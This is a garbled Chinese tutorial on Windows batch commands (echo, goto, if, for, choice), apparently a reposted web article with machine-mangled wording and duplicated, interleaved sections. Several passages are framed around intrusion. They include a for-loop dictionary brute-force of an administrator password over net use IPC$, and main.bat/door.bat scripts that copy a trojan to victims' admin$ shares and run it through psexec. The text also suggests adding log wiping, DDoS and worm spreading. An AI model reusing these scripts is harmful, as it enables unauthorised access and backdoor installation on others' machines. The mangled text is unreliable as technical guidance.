转百度知道,BAT命令介绍
分类:美高梅-操作

Windows cmd

一.轻便批管理之中命令简单介绍
1.Echo 命令
开拓回显或关闭央浼回显功用,或浮现音讯。若无其它参数,echo 命令将体现当前回显设置。
语法
echo [{ on|off }] [message]
Sample:@echo off / echo hello world
在其实应用中大家会把那条命令和重定向符号(也称得上管道符号,一般用> >> ^)结合来促成输入一些下令到特定格式的文件中.那将要其后的例证中反映出来。

windows bat(批管理)——基础语法

一.简单批管理之中命令简要介绍

对于跨平台的前后相继,经常会提供一些管用的命令行工具,由此shell脚本、bat脚本文件就必须了。网络上shell的书、作品都游人如织的,所以通晓起来会相对轻便的多,而windows下的bat网络则少有关系。这里不计划写windows bat 编制程序大全,而是简单对bat做二个简练的入门级的求学。

2.@ 命令
表示不显示@后边的授命,在侵略进度中(举个例子利用批管理来格式化敌人的硬盘)自然无法让对方看到你使用的下令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这么些命令是不得以采取/y这几个参数的,可喜的是微软留了个autoset那么些参数给我们,效果和/y是同一的。)

 

1.Echo 命令
张开回显或关闭央求回显功效,或展现新闻。若无其余参数,echo 命令将显妥帖前回显设置。

随意在写shell,如故bat,它们的规划都服从那样一条标准:一切都以命令。Windows下命令是高低写不灵活的。

3.Goto 命令
点名跳转到标签,找到标签后,程序将处理从下一行伊始的指令。
语法:goto label (label是参数,钦点所要转向的批管理程序中的行。)
Sample:
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms(假若这里的if、%1、%2你不知晓的话,先跳过去,后边会有详实的演说。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字能够随意起,但是最为是有含义的假名啦,字母前加个:用来表示那么些字母是标签,goto命令正是依赖这几个:来搜索下一步跳到到这里。最佳有局地证实那样您旁人看起来才会明白你的用意啊。

  1. @

语法:
echo [{on│off}] [message]
Sample:@echo off / echo hello world

 

4.Rem 命令
申明命令,在C语言中一定与/*--------*/,它并不会被推行,只是起一个表明的功效,便于外人阅读和你和煦现在涂改。
Rem Message
Sample:@Rem Here is the description.

行首有了它的话,这一行的命令就不显得了。

在实际利用中大家会把那条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来完结输入一些命

大旨命令(rem, echo, @,/?)

rem:注释 (comment, remarks)。参数可以是别的内容。

echo :它有七个功效:打印音讯、调节和测量检验按钮。纵然参数是on 恐怕off,代表展开、关闭调节和测验,要是后面是任何内容,则参数代表要出口的信息。为啥正是debug开关呢?要是设置了echo on,随后奉行的别的命令及其实行结果都会输出到正规输出流。

@用来关闭有个别命令的调节和测量试验音讯,意思是说利用@标明的指令不会打出命令自身、施行结果。

/? 查看命令帮忙

例如:

REM open the cmd echo
@echo on
echo hello, windows cmd 
@echo hello, windows cmd 

REM close the cmd echo
@echo off
echo hello, windows cmd 
@echo hello, windows cmd

 

实行结果: 

D:Notewindows cmd>REM open the cmd echo

D:Notewindows cmd>echo hello, windows cmd
hello, windows cmd
hello, windows cmd

D:Notewindows cmd>REM close the cmd echo
hello, windows cmd
hello, windows cmd

 

对于REM的指令,也是会打到STD里,借使不期望看到,就可以动用@标记。 

 

 

5.Pause 命令

  1. echo

令到一定格式的文书中.那即将事后的例子中呈现出来。

支配命令(if-else, for-in-do, goto)

 

运营 Pause 命令时,将呈现上面包车型客车新闻:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d://back
echo Please put a new disk into driver A
pause
goto begin
在那个事例中,驱动器 A 中磁盘上的有着文件均复制到d://back中。彰显的批注提醒您将另一张磁盘归入驱动器 A 时,pause 命令会使程序挂起,以便你退换磁盘,然后按放肆键继续管理。

2.1  echo [{on|off}] [message]

2.@ 命令

if-else

 

if [noterrorlevel number command [else expression] 基于上一个命令执行的结果进行判定操作

if [notstring1==string2 command [else expression] 判定两个字符串是否相等

if [notexist FileName command [else expression]  判定指定的文件是否存在

If command extensions are enabled, use the following syntax:

if [/istring1 CompareOp string2 command [else expression] 进行字符串比较 (equ, neq, lss, leq, gtr, geq)

if cmdextversion number command [else expression]

if defined variable command [else expression]

 

 

 

6.Call 命令
从三个批管理程序调用另三个批管理程序,並且不甘休父批管理程序。call 命令接受用作调用指标的价签。要是在本子或批管理公事外使用 Call,它将不会在命令行起效率。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive: }[Path] FileName
点名要调用的批管理程序的职位和名称。filename 参数必得具备 .bat 或 .cmd 扩大名。

输出,回显。

代表不出示@前面的授命,在侵袭进度中(比方使用批管理来格式化敌人的硬盘)自然不可能让对方看来您使

For-in-do

巡回推行,命令语法:

for {%variable | %%variable} in (set) do command [CommandLineOptions]

1)For, in, do 是核心构造,至关重要;

2){%variable | %%variable} 供给的,变量大小写敏感。

在指令提醒符中实践for时,for中引用变量时,使用%

在批管理文件中进行for时,for中援用变量时,使用%%

除此以外,为了幸免与bat文件的参数 %0到 %9相争论,所以变量不能够是0-9的数字

3)( set ) 需求的。用于钦命七个 files, directories, range of values, textstrings。括号无法省。

 

4)command 须求的,代表要实施的下令。

5)commandLineOptions, 施行command时所需的参数

 

越多用法,只怕参照他事他说加以考察:

 

 

7.start 命令
调用外界程序,全数的DOS命令和下令行程序都足以由start命令来调用。
侵袭常用参数:
MIN 开端时窗口最小化
SEPARATE 在离别的半空中内最早 16 位 Windows 程序
HIGH 在 HIGH 优先级等级次序早先应用程序
REALTIME 在 REALTIME 优先级档案的次序起先应用程序
WAIT 运转应用程序并等候它甘休
parameters 这几个为传送到命令/程序的参数
实践的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就回到命令提醒。假设在命令脚本内实行,该新行为则不会爆发。
8.choice 命令
choice 使用此命令能够让顾客输入二个字符,进而运转分裂的授命。使用时应该加/c:参数,c:后应写提醒可输入的字符,之间无空格。它的重临码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的剧情如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先剖断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end

2.2 on | off

用的下令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这一个命令是不可能行使/y那些参数的,可喜的是微软留了个autoset那

goto

语法:goto label

跳转到钦点的label。倘诺内定的label不设有,就继续推行下一条命令。假若找到label,就从label处继续实行。若是程序以正常顺序实施到一个label处,并非经过goto跳转到label,label下的口舌如故以常规顺序试行。

 

美高梅网站是多少 1 

 

 

想要通晓越来越多指令参见:

 

 

 

 

 

 

 

:defrag
c://dos//defrag
goto end
:mem
mem
goto end
:end
echo good bye

它实际是贰个开关命令,正是说它唯有两种境况:张开和倒闭。于是就有了echo on和echo off八个指令了。

个参数给大家,效果和/y是同一的。)

此文件运转后,将体现 defrag,mem,end[D,M,E]? 客商可采纳d m e ,然后if语句将作出剖断,d表示实行标号为defrag的程序段,m表示施行标号为mem的程序段,e表示实施标号为end的程序段,每种程序段最后都以goto end将顺序跳到end标号处,然后程序将体现good bye,文件截止。

(1)echo off

3.Goto 命令
内定跳转到标签,找到标签后,程序将拍卖从下一行起头的下令。

9.If 命令

只显示实践结果

语法:goto label (label是参数,钦命所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(假如这里的if、%1、%2你不明了的话,先跳过去,前面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end

if 代表将判定是还是不是符合规定的尺度,进而决定进行不一的指令。 有两种格式:

(2)echo on (默认)

标签的名字能够不管起,不过最为是有意义的字母啦,字母前加个:用来代表那几个字母是标签,goto命令

1、if "参数" == "字符串" 待实行的吩咐
参数要是等于钦定的字符串,则条件创设,运维命令,不然运维下一句。(注意是多少个等号)
如if "%1"=="a" format a:
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms

来得施行命令(除echo)和实施结果

正是基于这几个:来搜寻下一步跳到到那边。最棒有一对表达那样你别人看起来才会领会您的来意啊。

2、if exist 文件名 待推行的命令
若是有钦点的文书,则条件组建,运营命令,不然运转下一句。
如if exist config.sys edit config.sys

(3)> 输出重定向

4.Rem 命令

3、if errorlevel / if not errorlevel 数字 待推行的通令
若果再次来到码等于钦点的数字,则条件创立,运维命令,不然运转下一句。
如if errorlevel 2 goto x2
DOS程序运营时都会回去八个数字给DOS,称为错误码errorlevel或称重回码,常见的回来码为0、1。

创设或清空文件,然后把数据输出到文件

评释命令,在C语言中一定与/*--------*/,它并不会被执行,只是起多个注明的效能,便于外人阅读和你

10.for 命令
for 命令是一个比较复杂的授命,首要用于参数在钦命的界定内循环施行命令。
在批管理公事中应用 FO大切诺基 命令时,钦赐变量请使用 %%variable

echo hi > a.txt

温馨未来修改。
Rem Message
Sample:@Rem Here is the description.

for { %variable|%%variable } in (set) do command [ CommandLineOptions]
%variable 钦命贰个纯净字母可替换的参数。
(set) 钦点叁个或一组文件。能够利用通配符。
command 内定对每一种文件实行的一声令下。
command-parameters 为一定命令钦点参数或命令行开关。
在批管理公事中采纳 FO奥迪Q5 命令时,钦命变量请使用 %%variable
而毫无用 %variable。变量名称是分别轻重缓急写的,所以 %i 差别于 %I

把数据追加到文件

5.Pause 命令

若果命令扩张名被启用,下列额外的 FO奇骏 命令格式会遭到
支持:

echo this is a text >>a.txt

运转 Pause 命令时,将展现下边的新闻:
Press any key to continue . . .

FOR /D %variable IN (set) DO command [command-parameters]

 

Sample:
@echo off
:begin
copy a:*.* d:back
echo Please put a new disk into driver A
pause
goto begin

假设集中包蕴通配符,则钦点与目录名相配,而不与公事
名匹配。

echo hi > a.txt

在那些例子中,驱动器 A 中磁盘上的享有文件均复制到d:back中。显示的笺注提醒您将另一张磁盘放入

FOR /R [[drive:]path] %variable IN (set) DO command [command-

type a.txt

驱动器 A 时,pause 命令会使程序挂起,以便你改变磁盘,然后按放肆键继续管理。

检查以 [drive:]path 为根的目录树,指向各类目录中的
FO安德拉 语句。要是在 /ENVISION 后不曾点名目录,则动用当前
目录。假设集仅为一个单点(.)字符,则枚举该目录树。

echo this is a text >>a.txt

6.Call 命令

FOR /L %variable IN (start,step,end) DO command [command-para

type a.txt

从三个批管理程序调用另贰个批管理程序,並且不安息父批处理程序。call 命令接受用作调用指标的竹签

该集表示以增量情势从先导到结束的二个数字体系。

 

。若是在本子或批管理公事外使用 Call,它将不会在命令行起作用。
语法:
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

使用批管理公事

  1. 注释

参数:
[Drive:}[Path] FileName

——常用命令

:: 或 rem

钦命要调用的批管理程序的地方和名称。filename 参数必需具备 .bat 或 .cmd 扩大名。

echo、@、call、pause、rem 是批管理公事最常用的几个指令,大家就从他们开首学起。 echo 表示呈现此命令后的字符
echo off 代表在此语句后有所运行的授命都不显得命令行自个儿
@ 与echo off相象,但它是加在其余命令行的最前边,表示运维时不展现命令行本人。
call 调用另一条批管理公事(假使平素调用其他批管理公事 ,推行完那条文件后将不可能推行当前文件延续命令)
pause 运营此句会暂停,展现Press any key to continue... 等待顾客按任意键后三番五次
rem 代表此命令后的字符为解释行,不实践,只是给自个儿事后探寻用的

 

7.start 命令

例:用edit编辑a.bat文件,输入下列内容后存盘为c:a.bat,试行该批管理文件后可完结:将根目录中具备文件写入 a.txt中,运行UCDOS,步入WPS等效能。

  1. ":"和 goto

调用外界程序,全体的DOS命令和下令行程序都能够由start命令来调用。
常用参数:
MIN 初始时窗口最小化
SEPARATE 在暌违的长空内初始 16 位 Windows 程序
HIGH 在 HIGH 优先级档期的顺序开首应用程序
REALTIME 在 REALTIME 优先级档期的顺序开端应用程序
WAIT 运转应用程序并听候它结束
parameters 那么些为传送到命令/程序的参数

批管理文件的开始和结果为: 文件表示:

(1)goto

实践的应用程序是 32-位 GUI 应用程序时,CMD.EXE不等应用程序终止就再次来到命令提醒。就算在指令脚本

echo off 不显示命令行

跳转到标签

内推行,该新作为则不会生出。
8.choice 命令

dir c:*.* >a.txt 将c盘文件列表写入a.txt

(2):

choice 使用此命令能够让顾客输入一个字符,进而运维差异的吩咐。使用时应该加/c:参数,c:后应写提

call c:ucdosucdos.bat 调用ucdos

概念四个标签

示可输入的字符,之间无空格。它的再次回到码为1234......

echo 你好 显示"你好"

 

如: choice /c:dme defrag,mem,end

pause 暂停,等待开关继续

            Sample:

将显示
defrag,mem,end[D,M,E]?

rem 使用wps 注释将利用wps

[python] 

Sample:
Sample.bat的剧情如下:

cd ucdos 进入ucdos目录

if {%1}=={} goto noparms  

@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先推断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end

wps 使用wps

if {%2}=={} goto noparms(要是这里的if、%1、%2你不清楚的话,先跳过去,后边会有详细的解说。)  

:defrag
c:dosdefrag
goto end
:mem
mem
goto end
:end
echo good bye

批管理公事中还是可以像C语言同样选拔参数,那只需用到二个参数表示符%。

@Rem check parameters if null show usage  

此文件运维后,将体现 defrag,mem,end[D,M,E]? 客户可选拔d m e ,然后if语句将作出判定,d表示实行

%表示参数,参数是指在运行批管理文件时在文件名后加的字符串。变量能够从 %0到%9,%0代表文件名自己,字符串用%1到%9一一表示。

:noparms  

注解为defrag的程序段,m表示实践标号为mem的程序段,e表示实行标号为end的程序段,每一个程序段最终

举个例子,C:根目录下一堆处理公事名字为f.bat,内容为 format %1

echo Usage: monitor.bat ServerIP PortNumber  

都是goto end将次第跳到end标号处,然后程序将显得good bye,文件截至。

则只要推行C:>f a: 则实际实施的是format a:

goto end  

9.If 命令

又如C:根目录下一群管理公事的名字为t.bat,内容为 type %1 type %2

5.Pause

if 表示将判定是不是符合规定的口径,进而调节实践不一的下令。

那么运行C:>t a.txt b.txt 将逐个地彰显a.txt和b.txt文件的剧情

运维 Pause 命令时,将显得下边包车型客车音讯:

有二种格式:

运用批管理文件

[python] 

1)、if "参数" == "字符串" 待执行的命令
参数借使等于钦点的字符串,则条件创立,运转命令,不然运维下一句。(注意是三个等号)

——特殊命令
if goto choice for 是批处理公事中相比高等的吩咐,尽管那多少个你用得很内行,你就是批处理公事的专家啦。

Press any key to continue . . .  

如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

if 代表将推断是或不是符合规定的标准,从而决定推行差别的授命。 有三种格式:
1、if "参数" == "字符串" 待实施的命令
参数假若等于钦赐的字符串,则条件建构,运维命令,不然运营下一句。(注意是四个等号)
如if "%1"=="a" format a:

 

2)、if exist 文件名 待试行的指令
设若有内定的公文,则条件创立,运行命令,不然运营下一句。
如if exist config.sys edit config.sys

2、if exist 文件名 待实践的吩咐
万一有钦定的文书,则条件构建,运营命令,不然运维下一句。如if exist config.sys edit config.sys

Sample:

3)、if errorlevel / if not errorlevel 数字 待实行的吩咐
倘若重临码等于钦赐的数字,则条件创立,运维命令,不然运转下一句。
如if errorlevel 2 goto x2
DOS程序运维时都会再次来到三个数字给DOS,称为错误码errorlevel或称重临码,常见的归来码为0、1。

3、if errorlevel 数字 待施行的指令
若果再次来到码等于钦命的数字,则条件创设,运维命令,不然运维下一句。如if errorlevel 2 goto x2 DOS程序运营时都会回去多个数字给DOS,称为错误码errorlevel或称重临码

[python] 

10.for 命令
for 命令是三个相比较复杂的一声令下,首要用来参数在钦赐的界定内循环试行命令。
在批管理公事中采用 FO宝马X3 命令时,钦点变量请使用 %%variable

goto 批管理公事运营到此处将跳到goto 所钦点的标记处, 一般与if合作使用。 如:

@echo off  

for {%variable│%%variable} in (set) do command [ CommandLineOptions]
%variable 钦命二个单纯字母可替换的参数。
(set) 钦定二个或一组文件。可以接纳通配符。
command 内定对各个文件实践的授命。
command-parameters 为特定命令钦命参数或命令行开关。

goto end

:begin  

在批管理公事中接纳 FO瑞鹰 命令时,钦赐变量请使用 %%variable
而实际不是用 %variable。变量名称是分别轻重缓急写的,所以 %i 差别于 %I

:end
echo this is the end

echo Pause  

假任务令扩张名被启用,下列额外的 FO奇骏 命令格式会见前碰到支撑:
FOR /D %variable IN (set) DO command [command-parameters]

评释用 :字符串 表示,标号所在行不被实践

pause  

借使集中包括通配符,则钦赐与目录名相称,而不与公事名相称。

choice 使用此命令能够让客户输入多少个字符,从而运转区别的指令。使用时应有加/c:参数,c:后应写提醒可输入的字符,之间无空格。它的重回码为1234……

goto begin  

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]

如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?

 

检查以 [drive:]path 为根的目录树,指向各类目录中的FO奇骏 语句。假如在 /安德拉后并未有一点点名目录,则利用

例如,test.bat的原委如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag 应先决断数值最高的错误码
if errorlevel 2 goto mem
if errotlevel 1 goto end

6.Call 命令

当前目录。即使集仅为贰个单点(.)字符,则枚举该目录树。

:defrag
c:dosdefrag
goto end

从三个批管理程序调用另三个批管理程序,并且不独有息父批管理程序。call 命令接受用作调用目的的竹签。要是在本子或批管理公事外使用 Call,它将不会在命令行起功用。

FOR /L %variable IN (start,step,end) DO command [command-parameters]

:mem
mem
goto end

语法

该集表示以增量格局从伊始到截止的叁个数字种类。
所以,(1,1,5) 将产生连串 1 2 3 4 5,(5,-1,1) 将发出
序列 (5 4 3 2 1)。

:end
echo good bye

call [Drive:][Path] FileName [BatchParameters] [:label [arguments]

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

此文件运行后,将显得 defrag,mem,end[D,M,E]? 客户可选用d m e ,然后if语句将作出判别,d表示实行标号为defrag的程序段,m表示实践标号为mem的程序段,e表示施行标号为end的程序段,每一种程序段最终都以goto end将次第跳到end标号处,然后程序将显得good bye,文件结束。

参数

或者,如果有 usebackq 选项:

for 循环命令,只要条件相符,它将一再举行同样命令。

[Drive:}[Path] FileName

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

格式FOR [%%f] in (集合) DO [命令]
假诺参数f在内定的集结内,则条件创设,实践命令

点名要调用的批处理程序的地点和称号。filename 参数必须具备 .bat 或 .cmd 扩大名。

filenameset 为三个或八个文件名。继续到 filenameset 中的下一个文件在此之前,每份文件都已被张开、读

一经一条批管理文件中有一行:
for %%c in (*.bat *.txt) do type %%c
意思是假诺是以bat或txt结尾的文本,则彰显文件的原委。

 

取并通过管理。
管理包含读取文件,将其分成一行行的文字,然后将每行深入分析成零或越来越多的暗号。然后用已找到的符号字

使用批管理公事

7.start 命令

符串变量值调用 For 循环。以暗中认可格局,/F 通过各种文件的每一行中分离的第一个空白符号。跳过空白

——autoexec.bat

调用外界程序,全体的DOS命令和指令行程序都得以由start命令来调用。

行。您可经过点名可选 "options" 参数代替暗中同意分析操作。这几个带引号的字符串包含贰个或四个钦命不相同

DOS在运营会自动运转autoexec.bat那条文件,一般大家在里面装载每便必用的顺序,如: path(设置路线)、smartdrv(磁盘加快)、 mouse(鼠标运行)、mscdex(光驱连接)、 doskey(键盘管理)、set(设置遇到变量)等。

侵袭常用参数:

分析选项的要害字。这个主要字为:

如果开发银行盘根目录中并未那一个文件,电脑会让客商输入日期和时间。

MIN 发轫时窗口最小化

eol=c - 指一个行注释字符的末段(就二个)
skip=n - 指在文件初叶时马虎的行数。
delims=xxx - 指分隔符集。这些替换了空格和跳格键的暗许分隔符集。
tokens=x,y,m-n - 指每行的哪一个标识被传送到每一种迭代的 for 自个儿。那会促成额外变量名称的
格式为三个限制。通过 nth 符号钦点 m 符号字符串中的最后二个字符星号,那么额外的变量就要终极一

比方说,三个头名的autoexec.bat内容如下:

SEPARATE 在分别的半空中内开首 16 位 Windows 程序

个暗记分析之分配并收受行的保留文本。
usebackq - 钦命新语法已在下类情况中运用:
在作为命令施行八个后引号的字符串何况引号字符为文字字符串命令并允许在 file-set中应用双引号扩起

@echo off 不突显命令行

HIGH 在 HIGH 优先级等级次序开端应用程序

文件名称。

prompt $p$g 设置提示符前有目录提示

REALTIME 在 REALTIME 优先级等级次序发轫应用程序

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

path c:dos;c:;c:windows;c:ucdos;c:tools 设置路径

WAIT 运转应用程序并听候它甘休

会剖判 myfile.txt 中的每一行,忽略以总部打头的那一个行,将每行中的第贰个和第八个暗记传递给 for

lh c:dosdoskey.com 加载键盘管理

parameters 这么些为传送到命令/程序的参数

程序体;用逗号和/或 空格定界符号。请小心,那一个 for 程序体的讲话援引 %i 来获取第二个暗号,引用

lh c:mousemouse.com 加载鼠标管理

执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就回到命令提示。借使在指令脚本内进行,该新作为则不会发生。

%j 来获得第多少个暗号,援引%k来获得第七个标记后的有着剩余符号。对于包括空格的文本名,您需求用

lh c:dossmartdrv.exe 加载磁盘加快管理

 

双引号将文件名括起来。为了用这种艺术来利用双引号,您还亟需使用 usebackq 选项,不然,双引号会

lh c:dosmscdex /S /D:MSCD000 /M:12 /V 加载CD-ROM驱动

8.choice 命令

被清楚成是当做定义某些要剖析的字符串的。

set temp=c:temp 设置有的时候目录

choice 使用此命令能够让客商输入三个字符,进而运维不一致的指令。使用时应有加/c:参数,c:后应写提醒可输入的字符,之间无空格。它的再次来到码为1234……

%i 专门在 for 语句中猎取申明,%j 和 %k 是因而tokens= 选项特地获得验证的。您能够通过 tokens=

如: choice /c:dme defrag,mem,end

一行钦命最多 26 个暗号,只要不总结证实三个过量字母 'z' 或'Z' 的变量。请记住,FO安德拉 变量是单一字

将显示

母、分高低写和全局的;同期无法有 52 个以上都在采取中。

defrag,mem,end[D,M,E]?

你仍能在周围字符串上采纳 FOGL450 /F 深入分析逻辑;方法是,用单引号将括号之间的 filenameset 括起来。

Sample:

这么,该字符串会被看成贰个文书中的三个纯粹输入行。

萨姆ple.bat的剧情如下:

末段,您能够用 FO陆风X8 /F 命令来深入分析命令的输出。方法是,将括号之间的 filenameset 形成一个反括字符

@echo off

串。该字符串会被当作命令行,传递到八个子 CMD.EXE,其出口会被抓进内部存款和储蓄器,并被当做文件分析。因而

choice /c:dme defrag,mem,end

,以下例子:

if errorlevel 3 goto defrag (应先决断数值最高的错误码)

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

if errorlevel 2 goto mem

会枚举当前条件中的意况变量名称。

if errotlevel 1 goto end

其余,FO科雷傲 变量参照的更迭已被增进。您今后得以运用下列选项语法:

 

~I - 删除任何引号("),扩大 %I
%~fI - 将 %I 扩张到一个全然合格的路径名
%~dI - 仅将 %I 扩展到多个驱动器号
%~pI - 仅将 %I 扩展到三个路线
%~nI - 仅将 %I 扩大到贰个文件名
%~xI - 仅将 %I 扩大到二个文件扩充名
%~sI - 扩大的渠道只包蕴短名
%~aI - 将 %I 增加到文件的文件属性
%~tI - 将 %I 扩张到文件的日子/时间
%~zI - 将 %I 扩展到文件的轻重缓急
%~$PATH:I - 查找列在路线境况变量的目录,并将 %I 扩充到找到的第三个精光合格的称号。借使情形变

:defrag

量未被定义,可能未有找到文件,此组合键会扩大空字符串

c:dosdefrag

能够组成修饰符来得到多重结果:

goto end

%~dpI - 仅将 %I 扩展到叁个驱动器号和路线
%~nxI - 仅将 %I 扩张到三个文书名和扩展名
%~fsI - 仅将 %I 扩展到一个富含短名的完好路线名
%~dp$PATH:i - 查找列在路径碰到变量的目录,并将 %I 扩展到找到的第二个驱动器号和渠道。
%~ftzaI - 将 %I 扩充到类似输出线路的 DI翼虎

:mem

在上述例子中,%I 和 PATH 可用其余有效数值替代。%~ 语法用叁个管用的 FOKuga变量名终止。接纳类似

mem

%I 的大写变量名相比易读,况且防止与不分大小写的组合键混淆。

goto end

如上是MS的法定援救,下边大家举多少个例证来具体说飞鹤(Nutrilon)下For命令在侵袭中的用途。

:end

sample2:

echo good bye

行使For命令来促成对一台指标Win2k主机的暴力密码破解。
我们用net use \ipipc$ "password" /u:"administrator"来品尝那和对象主机举行连接,当成功时记下

 

密码。
最根本的命令是一条:for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator"
用i%来代表admin的密码,在dict.txt中那么些取i%的值用net use 命令来连接。然后将程序运转结果传递给

此文件运转后,将呈现 defrag,mem,end[D,M,E]? 用户可挑选d m e ,然后if语句将作出判别,d表示试行标号为defrag的程序段,m表示推行标号为mem的程序段,e表示实施标号为end的程序段,每种程序段最终都以goto end将顺序跳到end标号处,然后程序将突显good bye,文件结束。

find命令--
for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"│find ":命令成功完

  1. %x 参数

成">>D:ok.txt ,这样就ko了。

%1 -- 第1个参数

sample3:

%2 -- 第2个参数

你有未有过手里有雅量肉鸡等着您去种后门+木马啊?,当数码比很多的时候,原来很欢畅的一件事都会

%3 -- 第3个参数

变得很烦心:)。文章最初就谈起应用批管理文件,能够简化平时或重复性任务。那么什么样兑现吗?呵呵

....

,看下去你就可以知道了。

net use \%1ipc$ %3 /u:"%2"

最主要命令也只有一条:(在批管理文件中动用 FOXC60 命令时,钦定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上边的sample1,在此地它代表按梯次将victim.txt中的内容传递给door.bat中的参数

%1 -- IP

%i %j %k。
而cultivate.bat无非正是用net use命令来树立IPC$连接,并copy木马+后门到victim,然后用再次回到码

%2 -- username

(If errorlever =)来筛选成功种植后门的主机,并echo出来,可能echo到钦命的文件。
delims= 代表vivtim.txt中的内容是一空格来分隔的。笔者想见到这里你也必将知道那victim.txt里的原委

%3 -- password

是怎么着的了。应该依附%%i %%j %%k表示的对象来排列,一般便是 ip password username。

 

代码雏形:

bat(批管理)基础语法 1. @ 行首有了它的话,这一行的指令就不显得了。 2. echo 2.1 echo [{on|off}] [message] 输出,回显。 2.2 on | off 它其实...

--------------- cut here then save as a batchfile(I call it main.bat )


@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end

--------------- cut here then save as a batchfile(I call it main.bat )


------------------- cut here then save as a batchfile(I call it door.bat) ------------------


@net use \%1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3

>>ko.txt
@psexec \%1 c:winntsystem32windrv32.exe
@psexec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.

----------------- cut here then save as a batchfile(I call it door.bat)


那只是三个电动种植后门批管理的雏形,七个批管理和后门程序(Windrv32.exe),PSexec.exe需放在统一

目录下.批管理内容
勉强可以扩充,举个例子:参与清除日志+DDOS的功力,参加定期增加客户的遵循,更深切一些得以使之具有机动传播功

能(蠕虫).此处相当的少做陈说,风乐趣的恋人可机关探究.

二.怎么着在批管理文件中使用参数

批管理中得以接纳参数,一般从1%到 9%那多少个,当有四个参数时索要用shift来运动,这种场合并比相当少见

,大家就不思虑它了。
sample1:fomat.bat

@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
本条例子用于一连地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有些画蛇添

足了~

sample2:

当大家要建设构造二个IPC$连接地时候总要输入一大串命令,弄倒霉就打错了,所以大家比不上把一些稳固命令

写入叁个批管理,把肉鸡地ip password username 当着参数来赋给那个批管理,那样就毫无每回都打命令

了。
@echo off
@net use \1%ipc$ "2%" /u:"3%" 注意哦,这里PASSWOCRUISERD是第四个参数。
@if errorlevel 1 echo connection failed
什么样,使用参数依旧比较轻便的吗?你如此帅一定学会了.No.3

三.如何行使组合命令(Compound Command)

1.&

Usage:第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法能够并且进行多条命令,而不管命令是或不是实践成功

Sample:
C:>dir z: & dir c:Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:Ex4rch

2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif

2.&&
Usage:第一条命令 && 第二条命令 [&& 第三条命令...]

用这种艺术能够相同的时候实行多条命令,当境遇推行出错的授命后将不进行前边的吩咐,倘若直白未曾出错则

直白实行完全体命令;

Sample:
C:>dir z: && dir c:Ex4rch
The system cannot find the path specified.

C:>dir c:Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:Ex4rch

2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备份的时候大概会用到这种命令会比较轻松,如:
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb

E:backup
若是远程服务器上存在backup.mdb文件,就执行copy命令,若不设有该公文则不进行copy命令。这种用法

能够轮换IF exist了.

3.││

Usage:第一条命令 ││ 第二条命令 [││ 第三条命令...]

用这种措施能够何况试行多条命令,当遇到推行不利的一声令下后将不奉行前边的下令,若无现身不利的

指令则平素实行完全部命令;

Sample:
C:Ex4rch>dir sometips.gif ││ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

重组命令使用的例子:
sample:
